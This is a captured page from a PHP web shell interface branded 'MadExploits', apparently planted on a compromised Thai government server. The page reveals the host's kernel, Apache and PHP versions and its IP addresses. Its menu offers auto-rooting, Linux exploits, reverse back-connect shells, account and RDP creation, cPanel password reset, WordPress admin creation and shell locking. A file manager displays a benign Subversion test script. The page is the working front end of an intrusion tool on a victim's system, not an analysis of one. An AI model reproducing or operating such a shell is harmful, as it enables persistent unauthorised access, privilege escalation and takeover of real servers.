Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
subversion-1.6.11 /
tools /
dist /
[ HOME SHELL ]
Name
Size
Permission
Action
construct-rolling-environment....
4.15
KB
-rwxr-xr-x
dist.sh
12.82
KB
-rwxr-xr-x
download-release.sh
275
B
-rwxr-xr-x
extract-for-examination.sh
212
B
-rwxr-xr-x
gen_nightly_ann.py
2
KB
-rwxr-xr-x
getsigs.py
2.61
KB
-rwxr-xr-x
nightly.sh
1.43
KB
-rwxr-xr-x
post-to-tigris.py
4.08
KB
-rwxr-xr-x
roll.sh
1.1
KB
-rwxr-xr-x
sample-rc-warning-index.html
3.29
KB
-rw-r--r--
test.sh
1.21
KB
-rwxr-xr-x
write-announcement.py
6.25
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : test.sh
#!/bin/sh set -e [ -e $HOME/.svndistrc ] && . $HOME/.svndistrc set -x [ ! -e Makefile ] && ./configure $TEST_CONFIGURE_OPTIONS make make swig-py make swig-pl make swig-rb make check-swig-py 2>&1 | tee tests-py.log make check-swig-pl 2>&1 | tee tests-pl.log make check-swig-rb SWIG_RB_TEST_VERBOSE=verbose 2>&1 | tee tests-rb.log TEST_DIR=`pwd`/subversion/tests/cmdline/svn-test-work rm -rf "$TEST_DIR" mkdir "$TEST_DIR" sudo umount "$TEST_DIR" || true sudo mount -t tmpfs tmpfs "$TEST_DIR" -o uid=`id -u`,mode=700,size=32M time make check CLEANUP=1 FS_TYPE=fsfs mv tests.log tests-local-fsfs.log time make check CLEANUP=1 FS_TYPE=bdb mv tests.log tests-local-bdb.log ./subversion/svnserve/svnserve -d -r `pwd`/subversion/tests/cmdline \ --listen-host 127.0.0.1 --listen-port 33690 time make check CLEANUP=1 FS_TYPE=fsfs BASE_URL=svn://localhost:33690 mv tests.log tests-svn-fsfs.log time make check CLEANUP=1 FS_TYPE=bdb BASE_URL=svn://localhost:33690 mv tests.log tests-svn-bdb.log pkill lt-svnserve time CLEANUP=1 FS_TYPE=fsfs ./subversion/tests/cmdline/davautocheck.sh mv tests.log tests-dav-fsfs.log time CLEANUP=1 FS_TYPE=bdb ./subversion/tests/cmdline/davautocheck.sh mv tests.log tests-dav-bdb.log sudo umount "$TEST_DIR"
Close